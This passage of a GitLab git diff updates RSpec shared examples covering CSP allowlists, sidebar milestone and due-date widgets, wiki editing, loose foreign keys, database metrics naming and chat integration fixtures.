RSpec.shared_examples 'wiki controller actions' do expect(response.headers['Content-Disposition']).to match(/^inline/) expect(response.headers[Gitlab::Workhorse::DETECT_HEADER]).to eq('true') expect(response.cache_control[:public]).to be(false) - expect(response.headers['Cache-Control']).to eq('private, no-store') + expect(response.headers['Cache-Control']).to eq('max-age=60, private') end end end diff --git a/spec/support/shared_examples/csp.rb b/spec/support/shared_examples/csp.rb index c4a8c7df898..9143d0f4720 100644 --- a/spec/support/shared_examples/csp.rb +++ b/spec/support/shared_examples/csp.rb @@ -28,7 +28,7 @@ RSpec.shared_examples 'setting CSP' do |rule_name| context 'when feature is enabled' do it "appends to #{rule_name}" do - is_expected.to eql("#{rule_name} #{default_csp_values} #{whitelisted_url}") + is_expected.to eql("#{rule_name} #{default_csp_values} #{allowlisted_url}") end end @@ -46,7 +46,7 @@ RSpec.shared_examples 'setting CSP' do |rule_name| context 'when feature is enabled' do it "uses default-src values in #{rule_name}" do - is_expected.to eql("default-src #{default_csp_values}; #{rule_name} #{default_csp_values} #{whitelisted_url}") + is_expected.to eql("default-src #{default_csp_values}; #{rule_name} #{default_csp_values} #{allowlisted_url}") end end @@ -64,7 +64,7 @@ RSpec.shared_examples 'setting CSP' do |rule_name| context 'when feature is enabled' do it "uses default-src values in #{rule_name}" do - is_expected.to eql("font-src #{default_csp_values}; #{rule_name} #{whitelisted_url}") + is_expected.to eql("font-src #{default_csp_values}; #{rule_name} #{allowlisted_url}") end end diff --git a/spec/support/shared_examples/features/page_description_shared_examples.rb b/spec/support/shared_examples/features/page_description_shared_examples.rb index 81653220b4c..e3ea36633d1 100644 --- a/spec/support/shared_examples/features/page_description_shared_examples.rb +++ b/spec/support/shared_examples/features/page_description_shared_examples.rb @@ -7,3 +7,13 @@ RSpec.shared_examples 'page meta description' do |expected_description| end end end + +RSpec.shared_examples 'default brand title page meta description' do + include AppearancesHelper + + it 'renders the page with description, og:description, and twitter:description meta tags with the default brand title', :aggregate_failures do + %w(name='description' property='og:description' property='twitter:description').each do |selector| + expect(page).to have_selector("meta[#{selector}][content='#{default_brand_title}']", visible: false) + end + end +end diff --git a/spec/support/shared_examples/features/sidebar/sidebar_due_date_shared_examples.rb b/spec/support/shared_examples/features/sidebar/sidebar_due_date_shared_examples.rb new file mode 100644 index 00000000000..345dfbce423 --- /dev/null +++ b/spec/support/shared_examples/features/sidebar/sidebar_due_date_shared_examples.rb @@ -0,0 +1,30 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'date sidebar widget' do + context 'editing due date' do + let(:due_date_value) { find('[data-testid="sidebar-due-date"] [data-testid="sidebar-date-value"]') } + + around do |example| + freeze_time { example.run } + end + + it 'displays "None" when there is no due date' do + expect(due_date_value.text).to have_content 'None' + end + + it 'updates due date' do + page.within('[data-testid="sidebar-due-date"]') do + today = Date.today.day + + click_button 'Edit' + + click_button today.to_s + + wait_for_requests + + expect(page).to have_content(today.to_s(:medium)) + expect(due_date_value.text).to have_content Time.current.strftime('%b %-d, %Y') + end + end + end +end diff --git a/spec/support/shared_examples/features/sidebar/sidebar_milestone_shared_examples.rb b/spec/support/shared_examples/features/sidebar/sidebar_milestone_shared_examples.rb new file mode 100644 index 00000000000..da730240e8e --- /dev/null +++ b/spec/support/shared_examples/features/sidebar/sidebar_milestone_shared_examples.rb @@ -0,0 +1,60 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'milestone sidebar widget' do + context 'editing milestone' do + let_it_be(:milestone_expired) { create(:milestone, project: project, title: 'Foo - expired', due_date: 5.days.ago) } + let_it_be(:milestone_no_duedate) { create(:milestone, project: project, title: 'Foo - No due date') } + let_it_be(:milestone1) { create(:milestone, project: project, title: 'Milestone-1', due_date: 20.days.from_now) } + let_it_be(:milestone2) { create(:milestone, project: project, title: 'Milestone-2', due_date: 15.days.from_now) } + let_it_be(:milestone3) { create(:milestone, project: project, title: 'Milestone-3', due_date: 10.days.from_now) } + + let(:milestone_widget) { find('[data-testid="sidebar-milestones"]') } + + before do + within(milestone_widget) do + click_button 'Edit' + end + + wait_for_all_requests + end + + it 'shows milestones list in the dropdown' do + # 5 milestones + "No milestone" = 6 items + expect(milestone_widget.find('.gl-new-dropdown-contents')).to have_selector('li.gl-new-dropdown-item', count: 6) + end + + it 'shows expired milestone at the bottom of the list and milestone due earliest at the top of the list', :aggregate_failures do + within(milestone_widget, '.gl-new-dropdown-contents') do + expect(page.find('li:last-child')).to have_content milestone_expired.title + + [milestone3, milestone2, milestone1, milestone_no_duedate].each_with_index do |m, i| + expect(page.all('li.gl-new-dropdown-item')[i + 1]).to have_content m.title + end + end + end + + it 'adds a milestone' do + within(milestone_widget) do + click_button milestone1.title + + wait_for_requests + + page.within('[data-testid="select-milestone"]') do + expect(page).to have_content(milestone1.title) + end + end + end + + it 'removes a milestone' do + within(milestone_widget) do + click_button "No milestone" + + wait_for_requests + + page.within('[data-testid="select-milestone"]') do + expect(page).not_to have_content(milestone1.title) + end + end + end + end +end diff --git a/spec/support/shared_examples/features/sidebar_shared_examples.rb b/spec/support/shared_examples/features/sidebar_shared_examples.rb index d509d124de0..615f568420e 100644 --- a/spec/support/shared_examples/features/sidebar_shared_examples.rb +++ b/spec/support/shared_examples/features/sidebar_shared_examples.rb @@ -5,6 +5,7 @@ RSpec.shared_examples 'issue boards sidebar' do before do first_card.click + wait_for_requests end it 'shows sidebar when clicking issue' do @@ -41,6 +42,14 @@ RSpec.shared_examples 'issue boards sidebar' do end end + context 'editing issue milestone', :js do + it_behaves_like 'milestone sidebar widget' + end + + context 'editing issue due date', :js do + it_behaves_like 'date sidebar widget' + end + context 'in notifications subscription' do it 'displays notifications toggle', :aggregate_failures do page.within('[data-testid="sidebar-notifications"]') do diff --git a/spec/support/shared_examples/features/snippets_shared_examples.rb b/spec/support/shared_examples/features/snippets_shared_examples.rb index bd1a67f3bb5..c402333107c 100644 --- a/spec/support/shared_examples/features/snippets_shared_examples.rb +++ b/spec/support/shared_examples/features/snippets_shared_examples.rb @@ -20,7 +20,7 @@ RSpec.shared_examples 'paginated snippets' do |remote: false| end RSpec.shared_examples 'tabs with counts' do - let(:tabs) { page.all('.snippet-scope-menu li') } + let(:tabs) { page.all('.js-snippets-nav-tabs li') } it 'shows a tab for All snippets and count' do tab = tabs[0] diff --git a/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb b/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb index 7ced8508a31..a456b76b324 100644 --- a/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb +++ b/spec/support/shared_examples/features/wiki/user_updates_wiki_page_shared_examples.rb @@ -138,11 +138,26 @@ RSpec.shared_examples 'User updates wiki page' do end context 'when using the content editor' do - before do - click_button 'Use the new editor' + context 'with feature flag on' do + before do + click_button 'Edit rich text' + end + + it_behaves_like 'edits content using the content editor' end - it_behaves_like 'edits content using the content editor' + context 'with feature flag off' do + before do + stub_feature_flags(wiki_switch_between_content_editor_raw_markdown: false) + visit(wiki_path(wiki)) + + click_link('Edit') + + click_button 'Use the new editor' + end + + it_behaves_like 'edits content using the content editor' + end end end diff --git a/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb b/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb index 96df5a5f972..eec911f3b6f 100644 --- a/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb +++ b/spec/support/shared_examples/features/wiki/user_views_wiki_page_shared_examples.rb @@ -161,7 +161,7 @@ RSpec.shared_examples 'User views a wiki page' do commit = wiki.commit visit wiki_page_path(wiki, wiki_page, version_id: commit, action: :diff) - expect(page).to have_content('by John Doe') + expect(page).to have_content('by Sidney Jones') expect(page).to have_content('updated home') expect(page).to have_content('Showing 1 changed file with 1 addition and 3 deletions') expect(page).to have_content('some link') @@ -174,7 +174,7 @@ RSpec.shared_examples 'User views a wiki page' do commit = wiki.commit('HEAD^') visit wiki_page_path(wiki, wiki_page, version_id: commit, action: :diff) - expect(page).to have_content('by John Doe') + expect(page).to have_content('by Sidney Jones') expect(page).to have_content('updated home') expect(page).to have_content('Showing 1 changed file with 1 addition and 3 deletions') expect(page).to have_content('some link') @@ -188,7 +188,7 @@ RSpec.shared_examples 'User views a wiki page' do commit = wiki.commit('HEAD^') visit wiki_page_path(wiki, wiki_page, version_id: commit, action: :diff) - expect(page).to have_content('by John Doe') + expect(page).to have_content('by Sidney Jones') expect(page).to have_content('created page: home') expect(page).to have_content('Showing 1 changed file with 4 additions and 0 deletions') expect(page).to have_content('Look at this') diff --git a/spec/support/shared_examples/lib/gitlab/background_migration/mentions_migration_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/background_migration/mentions_migration_shared_examples.rb deleted file mode 100644 index 7707e79386c..00000000000 --- a/spec/support/shared_examples/lib/gitlab/background_migration/mentions_migration_shared_examples.rb +++ /dev/null @@ -1,108 +0,0 @@ -# frozen_string_literal: true - -RSpec.shared_examples 'resource mentions migration' do |migration_class, resource_class_name| - it 'migrates resource mentions' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - resource_class = "#{Gitlab::BackgroundMigration::UserMentions::Models}::#{resource_class_name}".constantize - - expect do - subject.perform(resource_class_name, join, conditions, false, resource_class.minimum(:id), resource_class.maximum(:id)) - end.to change { user_mentions.count }.by(1) - - user_mention = user_mentions.last - expect(user_mention.mentioned_users_ids.sort).to eq(mentioned_users.pluck(:id).sort) - expect(user_mention.mentioned_groups_ids.sort).to eq([group.id]) - expect(user_mention.mentioned_groups_ids.sort).not_to include(inaccessible_group.id) - - # check that performing the same job twice does not fail and does not change counts - expect do - subject.perform(resource_class_name, join, conditions, false, resource_class.minimum(:id), resource_class.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end - -RSpec.shared_examples 'resource notes mentions migration' do |migration_class, resource_class_name| - it 'migrates mentions from note' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - - # there are 5 notes for each noteable_type, but two do not have mentions and - # another one's noteable_id points to an inexistent resource - expect(notes.where(noteable_type: resource_class_name).count).to eq 5 - expect(user_mentions.count).to eq 0 - - expect do - subject.perform(resource_class_name, join, conditions, true, Note.minimum(:id), Note.maximum(:id)) - end.to change { user_mentions.count }.by(2) - - # check that the user_mention for regular note is created - user_mention = user_mentions.first - expect(Note.find(user_mention.note_id).system).to be false - expect(user_mention.mentioned_users_ids.sort).to eq(users.pluck(:id).sort) - expect(user_mention.mentioned_groups_ids.sort).to eq([group.id]) - expect(user_mention.mentioned_groups_ids.sort).not_to include(inaccessible_group.id) - - # check that the user_mention for system note is created - user_mention = user_mentions.second - expect(Note.find(user_mention.note_id).system).to be true - expect(user_mention.mentioned_users_ids.sort).to eq(users.pluck(:id).sort) - expect(user_mention.mentioned_groups_ids.sort).to eq([group.id]) - expect(user_mention.mentioned_groups_ids.sort).not_to include(inaccessible_group.id) - - # check that performing the same job twice does not fail and does not change counts - expect do - subject.perform(resource_class_name, join, conditions, true, Note.minimum(:id), Note.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end - -RSpec.shared_examples 'schedules resource mentions migration' do |resource_class, is_for_notes| - before do - stub_const("#{described_class.name}::BATCH_SIZE", 1) - end - - it 'schedules background migrations' do - Sidekiq::Testing.fake! do - freeze_time do - resource_count = is_for_notes ? Note.count : resource_class.count - expect(resource_count).to eq 5 - - migrate! - - migration = described_class::MIGRATION - join = described_class::JOIN - conditions = described_class::QUERY_CONDITIONS - delay = described_class::DELAY - - expect(migration).to be_scheduled_delayed_migration(1 * delay, resource_class.name, join, conditions, is_for_notes, resource1.id, resource1.id) - expect(migration).to be_scheduled_delayed_migration(2 * delay, resource_class.name, join, conditions, is_for_notes, resource2.id, resource2.id) - expect(migration).to be_scheduled_delayed_migration(3 * delay, resource_class.name, join, conditions, is_for_notes, resource3.id, resource3.id) - expect(BackgroundMigrationWorker.jobs.size).to eq 3 - end - end - end -end - -RSpec.shared_examples 'resource migration not run' do |migration_class, resource_class_name| - it 'does not migrate mentions' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - resource_class = "#{Gitlab::BackgroundMigration::UserMentions::Models}::#{resource_class_name}".constantize - - expect do - subject.perform(resource_class_name, join, conditions, false, resource_class.minimum(:id), resource_class.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end - -RSpec.shared_examples 'resource notes migration not run' do |migration_class, resource_class_name| - it 'does not migrate mentions' do - join = migration_class::JOIN - conditions = migration_class::QUERY_CONDITIONS - - expect do - subject.perform(resource_class_name, join, conditions, true, Note.minimum(:id), Note.maximum(:id)) - end.to change { user_mentions.count }.by(0) - end -end diff --git a/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb index bd8bdd70ce5..bce889b454d 100644 --- a/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb +++ b/spec/support/shared_examples/lib/gitlab/cycle_analytics/event_shared_examples.rb @@ -9,7 +9,7 @@ RSpec.shared_examples_for 'value stream analytics event' do it { expect(described_class.identifier).to be_a_kind_of(Symbol) } it { expect(instance.object_type.ancestors).to include(ApplicationRecord) } it { expect(instance).to respond_to(:timestamp_projection) } - it { expect(instance).to respond_to(:markdown_description) } + it { expect(instance).to respond_to(:html_description) } it { expect(instance.column_list).to be_a_kind_of(Array) } describe '#apply_query_customization' do diff --git a/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb index 41d3d76b66b..03344584361 100644 --- a/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb +++ b/spec/support/shared_examples/lib/gitlab/import_export/attributes_permitter_shared_examples.rb @@ -1,6 +1,6 @@ # frozen_string_literal: true RSpec.shared_examples 'a permitted attribute' do |relation_sym, permitted_attributes, additional_attributes = []| - let(:prohibited_attributes) { %i[remote_url my_attributes my_ids token my_id test] } + let(:prohibited_attributes) { %w[remote_url my_attributes my_ids token my_id test] } let(:import_export_config) { Gitlab::ImportExport::Config.new.to_h } let(:project_relation_factory) { Gitlab::ImportExport::Project::RelationFactory } @@ -8,7 +8,7 @@ RSpec.shared_examples 'a permitted attribute' do |relation_sym, permitted_attrib let(:relation_hash) { (permitted_attributes + prohibited_attributes).map(&:to_s).zip([]).to_h } let(:relation_name) { project_relation_factory.overrides[relation_sym]&.to_sym || relation_sym } let(:relation_class) { project_relation_factory.relation_class(relation_name) } - let(:excluded_keys) { import_export_config.dig(:excluded_keys, relation_sym) || [] } + let(:excluded_keys) { (import_export_config.dig(:excluded_attributes, relation_sym) || []).map(&:to_s) } let(:cleaned_hash) do Gitlab::ImportExport::AttributeCleaner.new( @@ -18,7 +18,7 @@ RSpec.shared_examples 'a permitted attribute' do |relation_sym, permitted_attrib ).clean end - let(:permitted_hash) { subject.permit(relation_sym, relation_hash) } + let(:permitted_hash) { subject.permit(relation_sym, relation_hash).transform_keys { |k| k.to_s } } if described_class.new.permitted_attributes_defined?(relation_sym) it 'contains only attributes that are defined as permitted in the import/export config' do @@ -26,11 +26,11 @@ RSpec.shared_examples 'a permitted attribute' do |relation_sym, permitted_attrib end it 'does not contain attributes that would be cleaned with AttributeCleaner' do - expect(cleaned_hash.keys + additional_attributes.to_a).to include(*permitted_hash.keys) + expect(cleaned_hash.keys + additional_attributes.to_a.map(&:to_s)).to include(*permitted_hash.keys) end it 'does not contain prohibited attributes that are not related to given relation' do - expect(permitted_hash.keys).not_to include(*prohibited_attributes.map(&:to_s)) + expect(permitted_hash.keys).not_to include(*prohibited_attributes) end else it 'is disabled' do diff --git a/spec/support/shared_examples/lib/gitlab/redis/multi_store_feature_flags_shared_examples.rb b/spec/support/shared_examples/lib/gitlab/redis/multi_store_feature_flags_shared_examples.rb new file mode 100644 index 00000000000..046c70bf779 --- /dev/null +++ b/spec/support/shared_examples/lib/gitlab/redis/multi_store_feature_flags_shared_examples.rb @@ -0,0 +1,43 @@ +# frozen_string_literal: true + +RSpec.shared_examples 'multi store feature flags' do |use_primary_and_secondary_stores, use_primary_store_as_default| + context "with feature flag :#{use_primary_and_secondary_stores} is enabled" do + before do + stub_feature_flags(use_primary_and_secondary_stores => true) + end + + it 'multi store is enabled' do + expect(subject.use_primary_and_secondary_stores?).to be true + end + end + + context "with feature flag :#{use_primary_and_secondary_stores} is disabled" do + before do + stub_feature_flags(use_primary_and_secondary_stores => false) + end + + it 'multi store is disabled' do + expect(subject.use_primary_and_secondary_stores?).to be false + end + end + + context "with feature flag :#{use_primary_store_as_default} is enabled" do + before do + stub_feature_flags(use_primary_store_as_default => true) + end + + it 'primary store is enabled' do + expect(subject.use_primary_store_as_default?).to be true + end + end + + context "with feature flag :#{use_primary_store_as_default} is disabled" do + before do + stub_feature_flags(use_primary_store_as_default => false) + end + + it 'primary store is disabled' do + expect(subject.use_primary_store_as_default?).to be false + end + end +end diff --git a/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb b/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb index 7ccd9533811..8f3a93de509 100644 --- a/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb +++ b/spec/support/shared_examples/loose_foreign_keys/have_loose_foreign_key.rb @@ -4,17 +4,12 @@ RSpec.shared_examples 'it has loose foreign keys' do let(:factory_name) { nil } let(:table_name) { described_class.table_name } let(:connection) { described_class.connection } - - it 'includes the LooseForeignKey module' do - expect(described_class.ancestors).to include(LooseForeignKey) - end - - it 'responds to #loose_foreign_key_definitions' do - expect(described_class).to respond_to(:loose_foreign_key_definitions) - end + let(:fully_qualified_table_name) { "#{connection.current_schema}.#{table_name}" } + let(:deleted_records) { LooseForeignKeys::DeletedRecord.where(fully_qualified_table_name: fully_qualified_table_name) } it 'has at least one loose foreign key definition' do - expect(described_class.loose_foreign_key_definitions.size).to be > 0 + definitions = Gitlab::Database::LooseForeignKeys.definitions_by_table[table_name] + expect(definitions.size).to be > 0 end it 'has the deletion trigger present' do @@ -32,9 +27,11 @@ RSpec.shared_examples 'it has loose foreign keys' do it 'records record deletions' do model = create(factory_name) # rubocop: disable Rails/SaveBang - model.destroy! - deleted_record = LooseForeignKeys::DeletedRecord.find_by(fully_qualified_table_name: "#{connection.current_schema}.#{table_name}", primary_key_value: model.id) + # using delete to avoid cross-database modification errors when associations with dependent option are present + model.delete + + deleted_record = deleted_records.find_by(primary_key_value: model.id) expect(deleted_record).not_to be_nil end @@ -42,11 +39,36 @@ RSpec.shared_examples 'it has loose foreign keys' do it 'cleans up record deletions' do model = create(factory_name) # rubocop: disable Rails/SaveBang - expect { model.destroy! }.to change { LooseForeignKeys::DeletedRecord.count }.by(1) + expect { model.delete }.to change { deleted_records.count }.by(1) LooseForeignKeys::ProcessDeletedRecordsService.new(connection: connection).execute - expect(LooseForeignKeys::DeletedRecord.status_pending.count).to be(0) - expect(LooseForeignKeys::DeletedRecord.status_processed.count).to be(1) + expect(deleted_records.status_pending.count).to be(0) + expect(deleted_records.status_processed.count).to be(1) + end +end + +RSpec.shared_examples 'cleanup by a loose foreign key' do + let(:foreign_key_definition) do + foreign_keys_for_parent = Gitlab::Database::LooseForeignKeys.definitions_by_table[parent.class.table_name] + foreign_keys_for_parent.find { |definition| definition.from_table == model.class.table_name } + end + + def find_model + model.class.find_by(id: model.id) + end + + it 'deletes the model' do + parent.delete + + expect(find_model).to be_present + + LooseForeignKeys::ProcessDeletedRecordsService.new(connection: model.connection).execute + + if foreign_key_definition.on_delete.eql?(:async_delete) + expect(find_model).not_to be_present + else + expect(find_model[foreign_key_definition.column]).to eq(nil) + end end end diff --git a/spec/support/shared_examples/mailers/notify_shared_examples.rb b/spec/support/shared_examples/mailers/notify_shared_examples.rb index e1f7a9030e2..20ed380fb18 100644 --- a/spec/support/shared_examples/mailers/notify_shared_examples.rb +++ b/spec/support/shared_examples/mailers/notify_shared_examples.rb @@ -161,6 +161,12 @@ RSpec.shared_examples 'it should not have Gmail Actions links' do end end +RSpec.shared_examples 'it should show Gmail Actions Join now link' do + it_behaves_like 'it should have Gmail Actions links' + + it { is_expected.to have_body_text('Join now') } +end + RSpec.shared_examples 'it should show Gmail Actions View Issue link' do it_behaves_like 'it should have Gmail Actions links' diff --git a/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb b/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb index c06083ba952..6e8c340582a 100644 --- a/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb +++ b/spec/support/shared_examples/metrics/active_record_subscriber_shared_examples.rb @@ -1,7 +1,11 @@ # frozen_string_literal: true RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| - let(:db_config_name) { ::Gitlab::Database.db_config_names.first } + let(:db_config_name) do + db_config_name = ::Gitlab::Database.db_config_names.first + db_config_name += "_replica" if db_role == :secondary + db_config_name + end let(:expected_payload_defaults) do result = {} @@ -39,15 +43,15 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| db_write_count: record_write_query ? 1 : 0, db_cached_count: record_cached_query ? 1 : 0, db_primary_cached_count: record_cached_query ? 1 : 0, - "db_primary_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, + "db_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, db_primary_count: record_query ? 1 : 0, - "db_primary_#{db_config_name}_count": record_query ? 1 : 0, + "db_#{db_config_name}_count": record_query ? 1 : 0, db_primary_duration_s: record_query ? 0.002 : 0.0, - "db_primary_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, + "db_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, db_primary_wal_count: record_wal_query ? 1 : 0, - "db_primary_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, + "db_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, db_primary_wal_cached_count: record_wal_query && record_cached_query ? 1 : 0, - "db_primary_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 1 : 0 + "db_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 1 : 0 }) elsif db_role == :replica transform_hash(expected_payload_defaults, { @@ -55,15 +59,15 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| db_write_count: record_write_query ? 1 : 0, db_cached_count: record_cached_query ? 1 : 0, db_replica_cached_count: record_cached_query ? 1 : 0, - "db_replica_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, + "db_#{db_config_name}_cached_count": record_cached_query ? 1 : 0, db_replica_count: record_query ? 1 : 0, - "db_replica_#{db_config_name}_count": record_query ? 1 : 0, + "db_#{db_config_name}_count": record_query ? 1 : 0, db_replica_duration_s: record_query ? 0.002 : 0.0, - "db_replica_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, + "db_#{db_config_name}_duration_s": record_query ? 0.002 : 0.0, db_replica_wal_count: record_wal_query ? 1 : 0, - "db_replica_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, + "db_#{db_config_name}_wal_count": record_wal_query ? 1 : 0, db_replica_wal_cached_count: record_wal_query && record_cached_query ? 1 : 0, - "db_replica_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 1 : 0 + "db_#{db_config_name}_wal_cached_count": record_wal_query && record_cached_query ? 1 : 0 }) else transform_hash(expected_payload_defaults, { @@ -71,15 +75,15 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| db_write_count: record_write_query ? 1 : 0, db_cached_count: record_cached_query ? 1 : 0, db_primary_cached_count: 0, - "db_primary_#{db_config_name}_cached_count": 0, + "db_#{db_config_name}_cached_count": 0, db_primary_count: 0, - "db_primary_#{db_config_name}_count": 0, + "db_#{db_config_name}_count": 0, db_primary_duration_s: 0.0, - "db_primary_#{db_config_name}_duration_s": 0.0, + "db_#{db_config_name}_duration_s": 0.0, db_primary_wal_count: 0, - "db_primary_#{db_config_name}_wal_count": 0, + "db_#{db_config_name}_wal_count": 0, db_primary_wal_cached_count: 0, - "db_primary_#{db_config_name}_wal_cached_count": 0 + "db_#{db_config_name}_wal_cached_count": 0 }) end @@ -105,7 +109,11 @@ RSpec.shared_examples 'store ActiveRecord info in RequestStore' do |db_role| end RSpec.shared_examples 'record ActiveRecord metrics in a metrics transaction' do |db_role| - let(:db_config_name) { ::Gitlab::Database.db_config_name(ApplicationRecord.retrieve_connection) } + let(:db_config_name) do + db_config_name = ::Gitlab::Database.db_config_names.first + db_config_name += "_replica" if db_role == :secondary + db_config_name + end it 'increments only db counters' do if record_query diff --git a/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb b/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb index 03f565e0aac..fe85daa7235 100644 --- a/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb +++ b/spec/support/shared_examples/models/atomic_internal_id_shared_examples.rb @@ -80,15 +80,22 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| it 'calls InternalId.generate_next and sets internal id attribute' do iid = rand(1..1000) - expect(InternalId).to receive(:generate_next).with(instance, scope_attrs, usage, any_args).and_return(iid) + # Need to do this before evaluating instance otherwise it gets set + # already in factory + allow(InternalId).to receive(:generate_next).and_return(iid) + subject expect(read_internal_id).to eq(iid) + + expect(InternalId).to have_received(:generate_next).with(instance, scope_attrs, usage, any_args) end it 'does not overwrite an existing internal id' do write_internal_id(4711) - expect { subject }.not_to change { read_internal_id } + allow_cross_database_modification_within_transaction(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347091') do + expect { subject }.not_to change { read_internal_id } + end end context 'when the instance has an internal ID set' do @@ -101,6 +108,7 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| .to receive(:track_greatest) .with(instance, scope_attrs, usage, internal_id, any_args) .and_return(internal_id) + subject end end @@ -110,7 +118,11 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| context 'when the internal id has been changed' do context 'when the internal id is automatically set' do it 'clears it on the instance' do - expect_iid_to_be_set_and_rollback + write_internal_id(nil) + + allow_cross_database_modification_within_transaction(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347091') do + expect_iid_to_be_set_and_rollback + end expect(read_internal_id).to be_nil end @@ -120,7 +132,9 @@ RSpec.shared_examples 'AtomicInternalId' do |validate_presence: true| it 'does not clear it on the instance' do write_internal_id(100) - expect_iid_to_be_set_and_rollback + allow_cross_database_modification_within_transaction(url: 'https://gitlab.com/gitlab-org/gitlab/-/issues/347091') do + expect_iid_to_be_set_and_rollback + end expect(read_internal_id).not_to be_nil end diff --git a/spec/support/shared_examples/models/chat_integration_shared_examples.rb b/spec/support/shared_examples/models/chat_integration_shared_examples.rb index 72659dd5f3b..e6b270c6188 100644 --- a/spec/support/shared_examples/models/chat_integration_shared_examples.rb +++ b/spec/support/shared_examples/models/chat_integration_shared_examples.rb @@ -71,7 +71,7 @@ RSpec.shared_examples "chat integration" do |integration_name| it "does not call #{integration_name} API" do result = subject.execute(sample_data) - expect(result).to be(false) + expect(result).to be_falsy expect(WebMock).not_to have_requested(:post, webhook_url) end end @@ -113,7 +113,7 @@ RSpec.shared_examples "chat integration" do |integration_name| context "with protected branch" do before do - create(:protected_branch, project: project, name: "a-protected-branch") + create(:protected_branch, :create_branch_on_repository, project: project, name: "a-protected-branch") end let(:sample_data) do @@ -309,7 +309,7 @@ RSpec.shared_examples "chat integration" do |integration_name| context "with protected branch" do before do - create(:protected_branch, project: project, name: "a-protected-branch") + create(:protected_branch, :create_branch_on_repository, project: project, name: "a-protected-branch") end let(:sample_data) do @@ -355,5 +355,11 @@ RSpec.shared_examples "chat integration" do |integration_name| end end end + + context 'deployment events' do + let(:sample_data) { Gitlab::DataBuilder::Deployment.build(create(:deployment), Time.now) } + + it_behaves_like "untriggered #{integration_name} integration" + end end end diff --git a/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb b/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb index 2d4c0b60f2b..ad15f82be5e 100644 --- a/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb +++ b/spec/support/shared_examples/models/concerns/integrations/slack_mattermost_notifier_shared_examples.rb @@ -305,7 +305,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch' do before do - create(:protected_branch, project: project, name: 'a-protected-branch') + create(:protected_branch, :create_branch_on_repository, project: project, name: 'a-protected-branch') end let(:data) do @@ -347,7 +347,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch with protected branches defined using wildcards' do before do - create(:protected_branch, project: project, name: '*-stable') + create(:protected_branch, :create_branch_on_repository, repository_branch_name: '1-stable', project: project, name: '*-stable') end let(:data) do @@ -560,7 +560,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch' do before do - create(:protected_branch, project: project, name: 'a-protected-branch') + create(:protected_branch, :create_branch_on_repository, project: project, name: 'a-protected-branch') end let(:pipeline) do @@ -590,7 +590,7 @@ RSpec.shared_examples Integrations::SlackMattermostNotifier do |service_name| context 'on a protected branch with protected branches defined usin wildcards' do before do - create(:protected_branch, project: project, name: '*-stable') + create(:protected_branch, :create_branch_on_repository, repository_branch_name: '1-stable', project: project, name: '*-stable') end let(:pipeline) do diff --git a/spec/support/shared_examples/models/member_shared_examples.rb b/spec/support/shared_examples/models/member_shared_examples.rb index a2909c66e22..d5d137922eb 100644 --- a/spec/support/shared_examples/models/member_shared_examples.rb +++ b/spec/support/shared_examples/models/member_shared_examples.rb @@ -301,10 +301,6 @@ RSpec.shared_examples_for "member creation" do end context 'when 